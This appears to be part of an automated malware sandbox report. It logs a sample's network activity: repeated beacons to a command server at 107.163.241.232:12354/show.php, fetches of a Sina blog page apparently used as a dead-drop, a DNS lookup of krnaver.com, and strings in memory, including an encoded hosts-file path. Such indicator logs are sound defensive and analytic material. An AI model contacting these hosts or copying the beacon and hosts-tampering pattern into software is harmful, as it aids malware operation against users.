Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficDNS traffic detected: DNS query: krnaver.com
Source: global trafficDNS traffic detected: DNS query: blog.sina.com.cn
Source: rundll32.exe, 00000005.00000002.4133737474.0000000005FBD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4132279546.00000000032C6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3974473541.0000000005FC2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4133198288.00000000053FD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://107.163.241.232:12354/show.php
Source: rundll32.exe, 00000005.00000002.4133972217.0000000006049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.241.232:12354/show.php&
Source: rundll32.exe, 00000005.00000002.4133153570.000000000537C000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4133198288.00000000053FD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://107.163.241.232:12354/show.php)
Source: rundll32.exe, 00000005.00000003.3574466944.0000000005FC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.241.232:12354/show.php7
Source: rundll32.exe, 00000005.00000002.4133972217.0000000006049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.241.232:12354/show.php8
Source: rundll32.exe, 00000005.00000002.4132279546.000000000321D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.241.232:12354/show.phpB
Source: rundll32.exe, 00000005.00000003.3574466944.0000000005FC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.241.232:12354/show.phpBreadcrumbStore
Source: rundll32.exe, 00000005.00000002.4133737474.0000000005FBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.241.232:12354/show.phpD
Source: rundll32.exe, 00000005.00000002.4133972217.0000000006049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.241.232:12354/show.phpF
Source: rundll32.exe, 00000005.00000002.4133972217.0000000006049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.241.232:12354/show.phpJ
Source: rundll32.exe, 00000005.00000002.4133972217.0000000006049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.241.232:12354/show.phpX
Source: rundll32.exe, 00000005.00000003.3574466944.0000000005FC2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4133737474.0000000005FBD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3974473541.0000000005FC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.241.232:12354/show.phpdK
Source: rundll32.exe, 00000005.00000002.4132279546.000000000327A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.241.232:12354/show.phpe
Source: rundll32.exe, 00000005.00000002.4133972217.0000000006049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.241.232:12354/show.phph
Source: rundll32.exe, 00000005.00000002.4133972217.0000000006049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.163.241.232:12354/show.phpr
Source: rundll32.exe, 00000005.00000002.4133153570.000000000537C000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4133198288.00000000053FD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://107.163.24I
Source: otsIBG7J9b.exe, otsIBG7J9b.exe, 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmp, ufcpp.exe, ufcpp.exe, 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://192.168.100.83/
Source: ufcpp.exe, ufcpp.exe, 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://192.168.100.83/9.htm
Source: otsIBG7J9b.exe, 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmp, ufcpp.exe, 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://192.168.100.83/9.htmhttp://192.168.100.83/F.htm%D
Source: otsIBG7J9b.exe, otsIBG7J9b.exe, 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmp, ufcpp.exe, ufcpp.exe, 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://192.168.100.83/F.htm
Source: rundll32.exe, rundll32.exe, 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: http://blog.sina.com.cn/u/%s
Source: rundll32.exe, 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: http://blog.sina.com.cn/u/%sXGRyaXZlcnNcZXRjXGhvc3RzLmljcw==XGRyaXZlcnNcZXRjXGhvc3Rz
Source: rundll32.exe, 00000005.00000002.4132279546.00000000032C6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3974473541.0000000005FC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5655029807
Source: rundll32.exe, 00000005.00000002.4133633291.0000000005EAD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5655029807.
Source: rundll32.exe, 00000005.00000002.4132279546.00000000032C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/56550298074
Source: rundll32.exe, 00000005.00000002.4133972217.0000000006049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5655029807H
Source: rundll32.exe, 00000005.00000002.4133972217.0000000006049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5655029807T
Source: rundll32.exe, 00000005.00000002.4132279546.000000000327A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5655029807a
Source: rundll32.exe, 00000005.00000002.4133972217.0000000006049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5655029807lication
Source: rundll32.exe, 00000005.00000003.3974473541.0000000005FC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5655029807z
Source: rundll32.exe, 00000005.00000003.3974473541.0000000005FC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5655029807z7
Source: rundll32.exe, 00000005.00000002.4133972217.0000000006049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5655029807zd
Source: rundll32.exe, 00000005.00000002.4132279546.000000000327A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5655029807zh
Source: otsIBG7J9b.exe, otsIBG7J9b.exe, 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmp, ufcpp.exe, ufcpp.exe, 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://www.1.com
Source: otsIBG7J9b.exe, 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmp, ufcpp.exe, 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://www.1.comhttp://192.168.100.83/a
Source: rundll32.exe, 00000005.00000002.4132279546.000000000327A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/
Source: rundll32.exe, 00000005.00000002.4132279546.000000000327A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/4
Source: rundll32.exe, 00000005.00000002.4133972217.000000000605D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/u/5655029807
Source: rundll32.exe, 00000005.00000003.3574466944.0000000005FC2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4133737474.0000000005FBD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3974473541.0000000005FC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/u/5655029807&K
Source: rundll32.exe, 00000005.00000002.4132279546.00000000032C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/u/5655029807.$
Source: rundll32.exe, 00000005.00000002.4132279546.000000000327A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/u/5655029807S
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50458
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50217
Source: unknownNetwork traffic detected: HTTP traffic on port 63726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50260 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50454
Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55345
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52511
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64219
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60255
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63924
Source: unknownNetwork traffic detected: HTTP traffic on port 60947 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 50314 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51462 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55203 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 54480 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56323
Source: unknownNetwork traffic detected: HTTP traffic on port 52665 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60947
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 65258 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
Source: unknownNetwork traffic detected: HTTP traffic on port 51249 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51931 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57279 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57279
Source: unknownNetwork traffic detected: HTTP traffic on port 50544 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60439
Source: unknownNetwork traffic detected: HTTP traffic on port 60255 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60439 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51017 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50458 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50549 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 61601 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52420
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50124
Source: unknownNetwork traffic detected: HTTP traffic on port 61399 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 56323 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52665
Source: unknownNetwork traffic detected: HTTP traffic on port 58772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57162
Source: unknownNetwork traffic detected: HTTP traffic on port 52279 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53009
Source: unknownNetwork traffic detected: HTTP traffic on port 63751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50813
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51462
Source: unknownNetwork traffic detected: HTTP traffic on port 52511 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52279
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58388
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63849
Source: unknownNetwork traffic detected: HTTP traffic on port 50674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50260
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56120
Source: unknownNetwork traffic detected: HTTP traffic on port 55345 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 63911 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
Source: unknownNetwork traffic detected: HTTP traffic on port 50169 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 60788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50549
Source: unknownNetwork traffic detected: HTTP traffic on port 56120 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50384
Source: unknownNetwork traffic detected: HTTP traffic on port 58943 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55675
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50544
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51630
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58943
Source: unknownNetwork traffic detected: HTTP traffic on port 55675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 64219 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61399
Source: unknownNetwork traffic detected: HTTP traffic on port 50384 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50314
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51249
Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50153
Source: unknownNetwork traffic detected: HTTP traffic on port 57162 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50674
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55203
Source: unknownNetwork traffic detected: HTTP traffic on port 50217 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54480
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61601
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59533
Source: unknownNetwork traffic detected: HTTP traffic on port 50454 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 59533 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53009 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51931
Source: unknownNetwork traffic detected: HTTP traffic on port 51630 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51017
Source: unknownNetwork traffic detected: HTTP traffic on port 63924 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50169
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63911
Source: unknownNetwork traffic detected: HTTP traffic on port 58388 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52420 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65258
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:49854 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:49927 version: TLS 1.2
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:50314 version: TLS 1.2
